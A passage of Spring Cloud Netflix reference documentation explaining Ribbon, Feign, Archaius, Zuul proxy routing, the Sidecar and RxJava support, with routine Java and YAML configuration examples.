`DiscoveryEnabledNIWSServerList`\nwhich populates the list of servers from Eureka. It also replaces the\n`IPing` interface with `NIWSDiscoveryPing` which delegates to Eureka\nto determine if a server is up. The `ServerList` that is installed by\ndefault is a `DomainExtractingServerList` and the purpose of this is\nto make physical metadata available to the load balancer without using\nAWS AMI metadata (which is what Netflix relies on). By default the\nserver list will be constructed with \"zone\" information as provided in\nthe instance metadata (so on the remote clients set\n`eureka.instance.metadataMap.zone`), and if that is missing it can use\nthe domain name from the server hostname as a proxy for zone (if the\nflag `approximateZoneFromHostname` is set). Once the zone information\nis available, it can be used in a `ServerListFilter`. By default it\nwill be used to locate a server in the same zone as the client because\nthe default is a `ZonePreferenceServerListFilter`. The zone of the\nclient is determined the same way as the remote instances by default,\ni.e. via `eureka.instance.metadataMap.zone`.\n\nNOTE: The orthodox \"archaius\" way to set the client zone is via a\nconfiguration property called \"@zone\", and Spring Cloud will use that\nin preference to all other settings if it is available (note that the\nkey will have to be quoted in YAML configuration).\n\nNOTE: If there is no other source of zone data then a guess is made\nbased on the client configuration (as opposed to the instance\nconfiguration). We take `eureka.client.availabilityZones`, which is a\nmap from region name to a list of zones, and pull out the first zone\nfor the instance's own region (i.e.
the `eureka.client.region`, which\ndefaults to \"us-east-1\" for compatibility with native Netflix).\n\n[[spring-cloud-ribbon-without-eureka]]\n=== Example: How to Use Ribbon Without Eureka\n\nEureka is a convenient way to abstract the discovery of remote servers\nso you don't have to hard code their URLs in clients, but if you\nprefer not to use it, Ribbon and Feign are still quite\namenable. Suppose you have declared a `@RibbonClient` for \"stores\",\nand Eureka is not in use (and not even on the classpath). The Ribbon\nclient defaults to a configured server list, and you can supply the\nconfiguration like this:\n\n.application.yml\n----\nstores:\n ribbon:\n listOfServers: example.com,google.com\n----\n\n=== Example: Disable Eureka use in Ribbon\n\nSetting the property `ribbon.eureka.enabled = false` will explicitly\ndisable the use of Eureka in Ribbon.\n\n.application.yml\n----\nribbon:\n eureka:\n enabled: false\n----\n\n=== Using the Ribbon API Directly\n\nYou can also use the `LoadBalancerClient` directly. Example:\n\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerClient loadBalancer;\n\n public void doStuff() {\n ServiceInstance instance = loadBalancer.choose(\"stores\");\n URI storesUri = URI.create(String.format(\"http:\/\/%s:%s\", instance.getHost(), instance.getPort()));\n \/\/ ... do something with the URI\n }\n}\n----\n\n[[spring-cloud-feign]]\n== Declarative REST Client: Feign\n\nhttps:\/\/github.com\/Netflix\/feign[Feign] is a declarative web service client. It makes writing web service clients easier. To use Feign create an interface and annotate it. It has pluggable annotation support including Feign annotations and JAX-RS annotations. Feign also supports pluggable encoders and decoders. Spring Cloud adds support for Spring MVC annotations and for using the same `HttpMessageConverters` used by default in Spring Web. Spring Cloud integrates Ribbon and Eureka to provide a load balanced http client when using Feign.\n\nExample Spring Boot app:\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@EnableFeignClients\npublic class Application {\n\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n\n}\n----\n\n.StoreClient.java\n[source,java,indent=0]\n----\n@FeignClient(\"stores\")\npublic interface StoreClient {\n @RequestMapping(method = RequestMethod.GET, value = \"\/stores\")\n List<Store> getStores();\n\n @RequestMapping(method = RequestMethod.POST, value = \"\/stores\/{storeId}\", consumes = \"application\/json\")\n Store update(@PathVariable(\"storeId\") Long storeId, Store store);\n}\n----\n\nIn the `@FeignClient` annotation the String value (\"stores\" above) is\nan arbitrary client name, which is used to create a Ribbon load\nbalancer (see <<spring-cloud-ribbon,below for details of Ribbon\nsupport>>). You can also specify a URL using the `url` attribute\n(absolute value or just a hostname). The name of the bean in the application context is the fully qualified name of the interface. An alias is also created which is the 'name' attribute plus 'FeignClient'. For the example above, `@Qualifier(\"storesFeignClient\")` could be used to reference the bean.
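The generated client can then be injected like any other Spring bean. A minimal sketch of using it (the controller class and mapping below are hypothetical, purely for illustration):\n\n[source,java,indent=0]\n----\n@RestController\npublic class StoreCountController {\n\n @Autowired\n private StoreClient storeClient;\n\n \/\/ delegates to the Feign client; Ribbon picks a \"stores\" instance\n @RequestMapping(\"\/store-count\")\n public int storeCount() {\n return storeClient.getStores().size();\n }\n}\n----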
The Ribbon client above will want to discover the physical addresses\nfor the \"stores\" service. If your application is a Eureka client then\nit will resolve the service in the Eureka service registry. If you\ndon't want to use Eureka, you can simply configure a list of servers\nin your external configuration (see\n<<spring-cloud-ribbon-without-eureka,above for example>>).\n\n[[spring-cloud-feign-overriding-defaults]]\n=== Overriding Feign Defaults\n\nA central concept in Spring Cloud's Feign support is that of the named client. Each feign client is part of an ensemble of components that work together to contact a remote server on demand, and the ensemble has a name that you give it as an application developer using the `@FeignClient` annotation. Spring Cloud creates a new ensemble as an\n`ApplicationContext` on demand for each named client using `FeignClientsConfiguration`. This contains (amongst other things) a `feign.Decoder`, a `feign.Encoder`, and a `feign.Contract`.\n\nSpring Cloud lets you take full control of the feign client by declaring additional configuration (on top of the `FeignClientsConfiguration`) using `@FeignClient`. Example:\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"stores\", configuration = FooConfiguration.class)\npublic interface StoreClient {\n \/\/..\n}\n----\n\nIn this case the client is composed from the components already in `FeignClientsConfiguration` together with any in `FooConfiguration` (where the latter will override the former).\n\nWARNING: The `FooConfiguration` has to be `@Configuration` but take care that it is not in a `@ComponentScan` for the main application context, otherwise it will be used for every `@FeignClient`. If you use `@ComponentScan` (or `@SpringBootApplication`) you need to take steps to avoid it being included (for instance put it in a separate, non-overlapping package, or specify the packages to scan explicitly in the `@ComponentScan`).\n\nNOTE: The `serviceId` attribute is now deprecated in favor of the `name` attribute.\n\nWARNING: Previously, using the `url` attribute did not require the `name` attribute. Using `name` is now required.\n\nPlaceholders are supported in the `name` and `url` attributes.\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"${feign.name}\", url = \"${feign.url}\")\npublic interface StoreClient {\n \/\/..\n}\n----\n\nSpring Cloud Netflix provides the following beans by default for feign (`BeanType` beanName: `ClassName`):\n\n* `Decoder` feignDecoder: `ResponseEntityDecoder` (which wraps a `SpringDecoder`)\n* `Encoder` feignEncoder: `SpringEncoder`\n* `Logger` feignLogger: `Slf4jLogger`\n* `Contract` feignContract: `SpringMvcContract`\n* `Feign.Builder` feignBuilder: `HystrixFeign.Builder`\n\nSpring Cloud Netflix _does not_ provide the following beans by default for feign, but still looks up beans of these types from the application context to create the feign client:\n\n* `Logger.Level`\n* `Retryer`\n* `ErrorDecoder`\n* `Request.Options`\n* `Collection<RequestInterceptor>`\n\nCreating a bean of one of those types and placing it in a `@FeignClient` configuration (such as `FooConfiguration` above) allows you to override each one of the beans described.
Example:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n public Contract feignContract() {\n return new feign.Contract.Default();\n }\n\n @Bean\n public BasicAuthRequestInterceptor basicAuthRequestInterceptor() {\n return new BasicAuthRequestInterceptor(\"user\", \"password\");\n }\n}\n----\n\nThis replaces the `SpringMvcContract` with `feign.Contract.Default` and adds a `RequestInterceptor` to the collection of `RequestInterceptor`s.\n\nDefault configurations can be specified in the `@EnableFeignClients` attribute `defaultConfiguration` in a similar manner as described above. The difference is that this configuration will apply to _all_ feign clients.\n\n[[spring-cloud-feign-hystrix]]\n=== Feign Hystrix Support\n\nIf Hystrix is on the classpath, by default Feign will wrap all methods with a circuit breaker. Returning a `com.netflix.hystrix.HystrixCommand` is also available. This lets you use reactive patterns (with a call to `.toObservable()` or `.observe()`) or asynchronous use (with a call to `.queue()`).\n\nTo disable Hystrix support for Feign, set `feign.hystrix.enabled=false`.\n\nTo disable Hystrix support on a per-client basis create a vanilla `Feign.Builder` with the \"prototype\" scope, e.g.:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n\t@Scope(\"prototype\")\n\tpublic Feign.Builder feignBuilder() {\n\t\treturn Feign.builder();\n\t}\n}\n----\n\n[[spring-cloud-feign-hystrix-fallback]]\n=== Feign Hystrix Fallbacks\n\nHystrix supports the notion of a fallback: a default code path that is executed when the circuit is open or there is an error. To enable fallbacks for a given `@FeignClient` set the `fallback` attribute to the class name that implements the fallback.\n\n[source,java,indent=0]\n----\n@FeignClient(name = \"hello\", fallback = HystrixClientFallback.class)\nprotected interface HystrixClient {\n @RequestMapping(method = RequestMethod.GET, value = \"\/hello\")\n Hello iFailSometimes();\n}\n\nstatic class HystrixClientFallback implements HystrixClient {\n @Override\n public Hello iFailSometimes() {\n return new Hello(\"fallback\");\n }\n}\n----\n\nWARNING: There is a limitation with the implementation of fallbacks in Feign and how Hystrix fallbacks work. Fallbacks are currently not supported for methods that return `com.netflix.hystrix.HystrixCommand` and `rx.Observable`.\n\n[[spring-cloud-feign-inheritance]]\n=== Feign Inheritance Support\n\nFeign supports boilerplate APIs via single-inheritance interfaces.\nThis allows grouping common operations into convenient base interfaces.\n\n.UserService.java\n[source,java,indent=0]\n----\npublic interface UserService {\n\n @RequestMapping(method = RequestMethod.GET, value =\"\/users\/{id}\")\n User getUser(@PathVariable(\"id\") long id);\n}\n----\n\n.UserResource.java\n[source,java,indent=0]\n----\n@RestController\npublic class UserResource implements UserService {\n\n}\n----\n\n.UserClient.java\n[source,java,indent=0]\n----\npackage project.user;\n\n@FeignClient(\"users\")\npublic interface UserClient extends UserService {\n\n}\n----\n\nNOTE: It is generally not advisable to share an interface between a\nserver and a client. It introduces tight coupling, and also actually\ndoesn't work with Spring MVC in its current form (method parameter\nmapping is not inherited).\n\n=== Feign request\/response compression\n\nYou may consider enabling the request or response GZIP compression for your\nFeign requests.
You can do this by enabling one of the properties:\n\n[source,properties]\n----\nfeign.compression.request.enabled=true\nfeign.compression.response.enabled=true\n----\n\nFeign request compression gives you settings similar to what you may set for your web server:\n\n[source,properties]\n----\nfeign.compression.request.enabled=true\nfeign.compression.request.mime-types=text\/xml,application\/xml,application\/json\nfeign.compression.request.min-request-size=2048\n----\n\nThese properties allow you to be selective about the compressed media types and minimum request threshold length.\n\n=== Feign logging\n\nA logger is created for each Feign client. By default the name of the logger is the full class name of the interface used to create the Feign client. Feign logging only responds to the `DEBUG` level.\n\n.application.yml\n\n[source,yaml]\n----\nlogging.level.project.user.UserClient: DEBUG\n----\n\nThe `Logger.Level` object that you may configure per client tells Feign how much to log. Choices are:\n\n* `NONE`, No logging (*DEFAULT*).\n* `BASIC`, Log only the request method and URL and the response status code and execution time.\n* `HEADERS`, Log the basic information along with request and response headers.\n* `FULL`, Log the headers, body, and metadata for both requests and responses.\n\nFor example, the following would set the `Logger.Level` to `FULL`:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n Logger.Level feignLoggerLevel() {\n return Logger.Level.FULL;\n }\n}\n----\n\n== External Configuration: Archaius\n\nhttps:\/\/github.com\/Netflix\/archaius[Archaius] is the Netflix client side configuration library. It is the library used by all of the Netflix OSS components for configuration. Archaius is an extension of the http:\/\/commons.apache.org\/proper\/commons-configuration[Apache Commons Configuration] project. It allows updates to configuration by either polling a source for changes or allowing a source to push changes to the client. Archaius uses Dynamic<Type>Property classes as handles to properties.\n\n.Archaius Example\n[source,java]\n----\nclass ArchaiusTest {\n DynamicStringProperty myprop = DynamicPropertyFactory\n .getInstance()\n .getStringProperty(\"my.prop\", null);\n\n void doSomething() {\n OtherClass.someMethod(myprop.get());\n }\n}\n----\n\nArchaius has its own set of configuration files and loading priorities. Spring applications should generally not use Archaius directly, but the need to configure the Netflix tools natively remains. Spring Cloud has a Spring Environment Bridge so Archaius can read properties from the Spring Environment. This allows Spring Boot projects to use the normal configuration toolchain, while allowing them to configure the Netflix tools, for the most part, as documented.
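As a sketch of the bridge in action: a property set in the normal Spring Boot way (the value below is arbitrary, and the property name matches the Archaius example above) becomes visible to the `DynamicStringProperty`:\n\n.application.yml\n[source,yaml]\n----\nmy:\n prop: hello-archaius\n----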
== Router and Filter: Zuul\n\nRouting is an integral part of a microservice architecture. For example, `\/` may be mapped to your web application, `\/api\/users` is mapped to the user service and `\/api\/shop` is mapped to the shop service. https:\/\/github.com\/Netflix\/zuul[Zuul] is a JVM based router and server side load balancer by Netflix.\n\nhttp:\/\/www.slideshare.net\/MikeyCohen1\/edge-architecture-ieee-international-conference-on-cloud-engineering-32240146\/27[Netflix uses Zuul] for the following:\n\n* Authentication\n* Insights\n* Stress Testing\n* Canary Testing\n* Dynamic Routing\n* Service Migration\n* Load Shedding\n* Security\n* Static Response handling\n* Active\/Active traffic management\n\nZuul's rule engine allows rules and filters to be written in essentially any JVM language, with built-in support for Java and Groovy.\n\nNOTE: The configuration property `zuul.max.host.connections` has been replaced by two new properties, `zuul.host.maxTotalConnections` and `zuul.host.maxPerRouteConnections` which default to 200 and 20 respectively.\n\n[[netflix-zuul-reverse-proxy]]\n=== Embedded Zuul Reverse Proxy\n\nSpring Cloud has created an embedded Zuul proxy to ease the\ndevelopment of a very common use case where a UI application wants to\nproxy calls to one or more back end services. This feature is useful\nfor a user interface to proxy to the backend services it requires,\navoiding the need to manage CORS and authentication concerns\nindependently for all the backends.\n\nTo enable it, annotate a Spring Boot main class with\n`@EnableZuulProxy`, and this forwards local calls to the appropriate\nservice. By convention, a service with the ID \"users\" will\nreceive requests from the proxy located at `\/users` (with the prefix\nstripped). The proxy uses Ribbon to locate an instance to forward to\nvia discovery, and all requests are executed in a Hystrix command, so\nfailures will show up in Hystrix metrics, and once the circuit is open\nthe proxy will not try to contact the service.\n\nNOTE: the Zuul starter does not include a discovery client, so for\nroutes based on service IDs you need to provide one of those\non the classpath as well (e.g. Eureka is one choice).\n\nTo skip having a service automatically added, set\n`zuul.ignored-services` to a list of service id patterns. If a service\nmatches a pattern that is ignored, but also included in the explicitly\nconfigured routes map, then it will be unignored. Example:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n ignoredServices: '*'\n routes:\n users: \/myusers\/**\n----\n\nIn this example, all services are ignored *except* \"users\".\n\nTo augment or change\nthe proxy routes, you can add external configuration like the\nfollowing:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users: \/myusers\/**\n----\n\nThis means that HTTP calls to \"\/myusers\" get forwarded to the \"users\"\nservice (for example \"\/myusers\/101\" is forwarded to \"\/101\").\n\nTo get more fine-grained control over a route you can specify the path\nand the serviceId independently:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n serviceId: users_service\n----\n\nThis means that HTTP calls to \"\/myusers\" get forwarded to the\n\"users_service\" service.
The route has to have a \"path\" which can be\nspecified as an ant-style pattern, so \"\/myusers\/{asterisk}\" only matches one\nlevel, but \"\/myusers\/{all}\" matches hierarchically.\n\nThe location of the backend can be specified as either a \"serviceId\"\n(for a service from discovery) or a \"url\" (for a physical location), e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n url: http:\/\/example.com\/users_service\n----\n\nThese simple url-routes don't get executed as a `HystrixCommand`, nor can you load-balance multiple URLs with Ribbon.\nTo achieve this, specify a service-route and configure a Ribbon client for the\nserviceId (this currently requires disabling Eureka support in Ribbon:\nsee <<spring-cloud-ribbon-without-eureka,above for more information>>), e.g.\n\n.application.yml\n[source,yaml]\n----\nzuul:\n routes:\n users:\n path: \/myusers\/**\n serviceId: users\n\nribbon:\n eureka:\n enabled: false\n\nusers:\n ribbon:\n listOfServers: example.com,google.com\n----\n\nYou can provide a convention between serviceId and routes using the\n`PatternServiceRouteMapper`. It uses regular expression named groups to extract\nvariables from serviceId and inject them into a route pattern.\n\n.ApplicationConfiguration.java\n[source,java]\n----\n@Bean\npublic PatternServiceRouteMapper serviceRouteMapper() {\n return new PatternServiceRouteMapper(\n \"(?<name>^.+)-(?<version>v.+$)\",\n \"${version}\/${name}\");\n}\n----\n\nThis means that a serviceId \"myusers-v1\" will be mapped to route\n\"\/v1\/myusers\/{all}\". Any regular expression is accepted but all named\ngroups must be present in both servicePattern and routePattern. If\nservicePattern does not match a serviceId, the default behavior is\nused. In the example above, a serviceId \"myusers\" will be mapped to route\n\"\/myusers\/{all}\" (no version detected). This feature is disabled by\ndefault and only applies to discovered services.\n\nTo add a prefix to all mappings, set `zuul.prefix` to a value, such as\n`\/api`. The proxy prefix is stripped from the request before the\nrequest is forwarded by default (switch this behaviour off with\n`zuul.stripPrefix=false`). You can also switch off the stripping of\nthe service-specific prefix from individual routes, e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n stripPrefix: false\n----\n\nIn this example, requests to \"\/myusers\/101\" will be forwarded to \"\/myusers\/101\" on the \"users\" service.\n\nThe `zuul.routes` entries actually bind to an object of type `ZuulProperties`. If you\nlook at the properties of that object you will see that it also has a \"retryable\" flag.\nSet that flag to \"true\" to have the Ribbon client automatically retry failed requests\n(and if you need to you can modify the parameters of the retry operations using\nthe Ribbon client configuration).
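For example, to make the \"users\" route from the examples above retryable (a sketch; only the `retryable` flag is new here):\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n retryable: true\n----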
The `X-Forwarded-Host` header is added to the forwarded requests by\ndefault. To turn it off set `zuul.addProxyHeaders = false`. The\nprefix path is stripped by default, and the request to the backend\npicks up a header \"X-Forwarded-Prefix\" (\"\/myusers\" in the examples\nabove).\n\nAn application with `@EnableZuulProxy` could act as a standalone\nserver if you set a default route (\"\/\"), for example `zuul.route.home:\n\/` would route all traffic (i.e. \"\/{all}\") to the \"home\" service.\n\nIf more fine-grained ignoring is needed, you can specify specific patterns to ignore.\nThese patterns are evaluated at the start of the route location process, which\nmeans prefixes should be included in the pattern to warrant a match. Ignored patterns\nspan all services and supersede any other route specification.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n ignoredPatterns: \/**\/admin\/**\n routes:\n users: \/myusers\/**\n----\n\nThis means that all calls such as \"\/myusers\/101\" will be forwarded to \"\/101\" on the \"users\" service.\nBut calls including \"\/admin\/\" will not resolve.\n\n=== Cookies and Sensitive Headers\n\nIt's OK to share headers between services in the same system, but you\nprobably don't want sensitive headers leaking downstream into external\nservers. You can specify a list of ignored headers as part of the\nroute configuration. Cookies play a special role because they have\nwell-defined semantics in browsers, and they are always to be treated\nas sensitive. If the consumer of your proxy is a browser, then cookies\nfor downstream services also cause problems for the user because they\nall get jumbled up (all downstream services look like they come from\nthe same place).\n\nIf you are careful with the design of your services, for example if\nonly one of the downstream services sets cookies, then you might be\nable to let them flow from the backend all the way up to the\ncaller. Also, if your proxy sets cookies and all your back end\nservices are part of the same system, it can be natural to simply\nshare them (and for instance use Spring Session to link them up to some\nshared state). Other than that, any cookies that get set by downstream\nservices are likely to be not very useful to the caller, so it is\nrecommended that you make (at least) \"Set-Cookie\" and \"Cookie\" into\nsensitive headers for routes that are not part of your domain. Even\nfor routes that *are* part of your domain, try to think carefully\nabout what it means before allowing cookies to flow between them and\nthe proxy.\n\nThe sensitive headers can be configured as a comma-separated list per\nroute, e.g.\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n users:\n path: \/myusers\/**\n sensitiveHeaders: Cookie,Set-Cookie,Authorization\n url: https:\/\/downstream\n----\n\nSensitive headers can also be set globally by setting `zuul.sensitiveHeaders`. If `sensitiveHeaders` is set on a route, this will override the global `sensitiveHeaders` setting.\n\nNOTE: this is the default value for `sensitiveHeaders`, so you don't\nneed to set it unless you want it to be different. N.B. this is new in\nSpring Cloud Netflix 1.1 (in 1.0 the user had no control over headers\nand all cookies flow in both directions).\n\nIn addition to the per-route sensitive headers, you can set a global\nvalue for `zuul.ignoredHeaders` for values that should be discarded\n(both request and response) during interactions with downstream\nservices. By default these are empty, if Spring Security is not on the\nclasspath, and otherwise they are initialized to a set of well-known\n\"security\" headers (e.g. involving caching) as specified by Spring\nSecurity. The assumption in this case is that the downstream services\nmight add these headers too, and we want the values from the proxy.\n\n=== The Routes Endpoint\n\nIf you are using `@EnableZuulProxy` with the Spring Boot Actuator you\nwill enable (by default) an additional endpoint, available via HTTP as\n`\/routes`. A GET to this endpoint will return a list of the mapped\nroutes. A POST will force a refresh of the existing routes (e.g. in\ncase there have been changes in the service catalog).\n\nNOTE: the routes should respond automatically to changes in the\nservice catalog, but the POST to \/routes is a way to force the change\nto happen immediately.
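A quick sketch on the command line (assuming the proxy is listening on localhost:8080):\n\n----\n$ curl localhost:8080\/routes\n$ curl -X POST localhost:8080\/routes\n----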
=== Strangulation Patterns and Local Forwards\n\nA common pattern when migrating an existing application or API is to\n\"strangle\" old endpoints, slowly replacing them with different\nimplementations. The Zuul proxy is a useful tool for this because you\ncan use it to handle all traffic from clients of the old endpoints,\nbut redirect some of the requests to new ones.\n\nExample configuration:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n first:\n path: \/first\/**\n url: http:\/\/first.example.com\n second:\n path: \/second\/**\n url: forward:\/second\n third:\n path: \/third\/**\n url: forward:\/3rd\n legacy:\n path: \/**\n url: http:\/\/legacy.example.com\n----\n\nIn this example we are strangling the \"legacy\" app which is mapped to\nall requests that do not match one of the other patterns. Paths in\n`\/first\/{all}` have been extracted into a new service with an external\nURL. And paths in `\/second\/{all}` are forwarded so they can be handled\nlocally, e.g. with a normal Spring `@RequestMapping`. Paths in\n`\/third\/{all}` are also forwarded, but with a different prefix\n(i.e. `\/third\/foo` is forwarded to `\/3rd\/foo`).\n\nNOTE: The ignored patterns aren't completely ignored, they just\naren't handled by the proxy (so they are also effectively forwarded\nlocally).\n\n=== Uploading Files through Zuul\n\nIf you `@EnableZuulProxy` you can use the proxy paths to\nupload files and it should just work as long as the files\nare small. For large files there is an alternative path\nwhich bypasses the Spring `DispatcherServlet` (to\navoid multipart processing) in \"\/zuul\/{asterisk}\". I.e. if\n`zuul.routes.customers=\/customers\/{all}` then you can\nPOST large files to \"\/zuul\/customers\/*\". The servlet\npath is externalized via `zuul.servletPath`. Extremely\nlarge files will also require elevated timeout settings\nif the proxy route takes you through a Ribbon load\nbalancer, e.g.\n\n.application.yml\n[source,yaml]\n----\nhystrix.command.default.execution.isolation.thread.timeoutInMilliseconds: 60000\nribbon:\n ConnectTimeout: 3000\n ReadTimeout: 60000\n----\n\nNote that for streaming to work with large files, you need to use chunked encoding in the request (which some browsers\ndo not do by default). E.g. on the command line:\n\n----\n$ curl -v -H \"Transfer-Encoding: chunked\" \\\n -F \"file=@mylarge.iso\" localhost:9999\/zuul\/simple\/file\n----\n\n=== Plain Embedded Zuul\n\nYou can also run a Zuul server without the proxying, or switch on parts of the proxying platform selectively, if you\nuse `@EnableZuulServer` (instead of `@EnableZuulProxy`). Any beans that you add to the application of type `ZuulFilter`\nwill be installed automatically, as they are with `@EnableZuulProxy`, but without any of the proxy filters being added\nautomatically (a sketch of such a filter follows the example below).\n\nIn this case the routes into the Zuul server are still specified by\nconfiguring \"zuul.routes.{asterisk}\", but there is no service\ndiscovery and no proxying, so the \"serviceId\" and \"url\" settings are\nignored. For example:\n\n.application.yml\n[source,yaml]\n----\n zuul:\n routes:\n api: \/api\/**\n----\n\nmaps all paths in \"\/api\/{all}\" to the Zuul filter chain.
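As a sketch of such a `ZuulFilter` bean (the filter below is hypothetical and purely illustrative; it uses the standard Netflix `ZuulFilter` contract of `filterType`, `filterOrder`, `shouldFilter` and `run`):\n\n[source,java,indent=0]\n----\npublic class LoggingFilter extends ZuulFilter {\n\n private static final Logger log = LoggerFactory.getLogger(LoggingFilter.class);\n\n @Override\n public String filterType() {\n return \"pre\"; \/\/ run before the request is routed\n }\n\n @Override\n public int filterOrder() {\n return 1;\n }\n\n @Override\n public boolean shouldFilter() {\n return true;\n }\n\n @Override\n public Object run() {\n \/\/ log the incoming request URI; the return value is ignored by Zuul\n HttpServletRequest request = RequestContext.getCurrentContext().getRequest();\n log.info(\"request to \" + request.getRequestURI());\n return null;\n }\n}\n----\n\nRegistering a bean of this type (e.g. with `@Bean`) is enough for it to be picked up.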
=== Disable Zuul Filters\n\nZuul for Spring Cloud comes with a number of `ZuulFilter` beans enabled by default\nin both proxy and server mode. See https:\/\/github.com\/spring-cloud\/spring-cloud-netflix\/tree\/master\/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters[the zuul filters package] for the\npossible filters that are enabled. If you want to disable one, simply set\n`zuul.<SimpleClassName>.<filterType>.disable=true`. By convention, the package after\n`filters` is the Zuul filter type. For example to disable\n`org.springframework.cloud.netflix.zuul.filters.post.SendResponseFilter` set\n`zuul.SendResponseFilter.post.disable=true`.\n\n=== Polyglot support with Sidecar\n\nDo you have non-JVM languages you want to take advantage of Eureka, Ribbon and\nConfig Server? The Spring Cloud Netflix Sidecar was inspired by\nhttps:\/\/github.com\/Netflix\/Prana[Netflix Prana]. It includes a simple HTTP API\nto get all of the instances (i.e. host and port) for a given service. You can\nalso proxy service calls through an embedded Zuul proxy which gets its route\nentries from Eureka. The Spring Cloud Config Server can be accessed directly\nvia host lookup or through the Zuul Proxy. The non-JVM app should implement\na health check so the Sidecar can report to Eureka if the app is up or down.\n\nTo enable the Sidecar, create a Spring Boot application with `@EnableSidecar`.\nThis annotation includes `@EnableCircuitBreaker`, `@EnableDiscoveryClient`,\nand `@EnableZuulProxy`. Run the resulting application on the same host as the\nnon-JVM application.\n\nTo configure the Sidecar, add `sidecar.port` and `sidecar.health-uri` to `application.yml`.\nThe `sidecar.port` property is the port the non-JVM app is listening on. This\nis so the Sidecar can properly register the app with Eureka. The `sidecar.health-uri`\nis a URI accessible on the non-JVM app that mimics a Spring Boot health\nindicator. It should return a JSON document like the following:\n\n.health-uri-document\n[source,json]\n----\n{\n \"status\":\"UP\"\n}\n----\n\nHere is an example application.yml for a Sidecar application:\n\n.application.yml\n[source,yaml]\n----\nserver:\n port: 5678\nspring:\n application:\n name: sidecar\n\nsidecar:\n port: 8000\n health-uri: http:\/\/localhost:8000\/health.json\n----\n\nThe API for the `DiscoveryClient.getInstances()` method is `\/hosts\/{serviceId}`.\nHere is an example response for `\/hosts\/customers` that returns two instances on\ndifferent hosts. This API is accessible to the non-JVM app (if the sidecar is\non port 5678) at `http:\/\/localhost:5678\/hosts\/{serviceId}`.\n\n.\/hosts\/customers\n[source,json]\n----\n[\n {\n \"host\": \"myhost\",\n \"port\": 9000,\n \"uri\": \"http:\/\/myhost:9000\",\n \"serviceId\": \"CUSTOMERS\",\n \"secure\": false\n },\n {\n \"host\": \"myhost2\",\n \"port\": 9000,\n \"uri\": \"http:\/\/myhost2:9000\",\n \"serviceId\": \"CUSTOMERS\",\n \"secure\": false\n }\n]\n----\n\nThe Zuul proxy automatically adds routes for each service known in Eureka to\n`\/<serviceId>`, so the customers service is available at `\/customers`. The\nnon-JVM app can access the customer service via `http:\/\/localhost:5678\/customers`\n(assuming the sidecar is listening on port 5678).\n\nIf the Config Server is registered with Eureka, a non-JVM application can access\nit via the Zuul proxy.
If the serviceId of the ConfigServer is `configserver`\nand the Sidecar is on port 5678, then it can be accessed at\nhttp:\/\/localhost:5678\/configserver\n\nA non-JVM app can take advantage of the Config Server's ability to return YAML\ndocuments. For example, a call to http:\/\/sidecar.local.spring.io:5678\/configserver\/default-master.yml\nmight result in a YAML document like the following:\n\n[source,yaml]\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n password: password\ninfo:\n description: Spring Cloud Samples\n url: https:\/\/github.com\/spring-cloud-samples\n----\n\n[[netflix-rxjava-springmvc]]\n== RxJava with Spring MVC\nSpring Cloud Netflix includes support for https:\/\/github.com\/ReactiveX\/RxJava[RxJava].\n\n> RxJava is a Java VM implementation of http:\/\/reactivex.io\/[Reactive Extensions]: a library for composing asynchronous and event-based programs by using observable sequences.\n\nSpring Cloud Netflix provides support for returning `rx.Single` objects from Spring MVC Controllers. It also supports using `rx.Observable` objects for https:\/\/en.wikipedia.org\/wiki\/Server-sent_events[Server-sent events (SSE)]. This can be very convenient if your internal APIs are already built using RxJava (see <<spring-cloud-feign-hystrix>> for examples).\n\nHere are some examples of using `rx.Single`:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/SingleReturnValueHandlerTest.java[tags=rx_single,indent=0]\n----\n\nIf you have an `Observable`, rather than a single, you can use `.toSingle()` or `.toList().toSingle()`. Here are some examples:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/ObservableReturnValueHandlerTest.java[tags=rx_observable,indent=0]\n----\n\nIf you have a streaming endpoint and client, SSE could be an option. To convert `rx.Observable` to a Spring `SseEmitter` use `RxResponse.sse()`. Here are some examples:\n\n[source,java]\n----\ninclude::..\/..\/..\/..\/spring-cloud-netflix-core\/src\/test\/java\/org\/springframework\/cloud\/netflix\/rx\/ObservableSseEmitterTest.java[tags=rx_observable_sse,indent=0]\n----\n\n[[netflix-metrics]]\n== Metrics: Spectator, Servo, and Atlas\n\nWhen used together, Spectator\/Servo and Atlas provide a near real-time operational insight platform.\n\nSpectator and Servo are Netflix's metrics collection libraries. Atlas is a Netflix metrics backend to manage dimensional time series data.\n\nServo served Netflix for several years and is still usable, but is gradually being phased out in favor of Spectator, which is only designed to work with Java 8. Spring Cloud Netflix provides support for both, but Java 8 based applications are encouraged to use Spectator.\n\n=== Dimensional vs. Hierarchical Metrics\n\nSpring Boot Actuator metrics are hierarchical and metrics are separated only by name. These names often follow a naming convention that embeds key\/value attribute pairs (dimensions) into the name separated by periods. Consider the following metrics for two endpoints, root and star-star:\n\n[source,json]\n----\n{\n \"counter.status.200.root\": 